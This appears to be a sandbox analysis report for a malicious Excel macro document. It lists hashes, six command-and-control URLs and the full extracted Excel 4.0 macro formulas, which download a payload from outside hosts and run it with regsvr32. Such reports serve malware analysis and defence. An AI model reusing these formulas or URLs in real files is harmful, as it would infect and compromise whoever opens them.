Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    b352ff5f3809f1f54cfa88eb8a1ff3bd4db6ae59a323ef8db61a44a29d0508a3

  • Size

    48KB

  • MD5

    74e3985712381d3b72554d8f936e9311

  • SHA1

    464ecb116a726e607126e3112db6d4dc30e5fa55

  • SHA256

    b352ff5f3809f1f54cfa88eb8a1ff3bd4db6ae59a323ef8db61a44a29d0508a3

  • SHA512

    d9aa193dd55ff8112d40c6d5718ffc207437224b4db51f25dbcdc678e4bf8d50784cbdf4942f52390e8960e404578d21083a41341ff1674e5e80a872e3efc200

  • SSDEEP

    768:k2uCkFF/vxRhR0KDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0BAR5:LuTlbMKDNck01u/R2rZyjB+5

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/OevI7Yy0i6YShxFl/

http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/

http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/

https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/

http://1000paginas.com/tienda/vWtT/

http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/OevI7Yy0i6YShxFl/","..\si.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/","..\si.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/","..\si.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/","..\si.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://1000paginas.com/tienda/vWtT/","..\si.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/","..\si.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\si.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • b352ff5f3809f1f54cfa88eb8a1ff3bd4db6ae59a323ef8db61a44a29d0508a3
    .xlsm office2007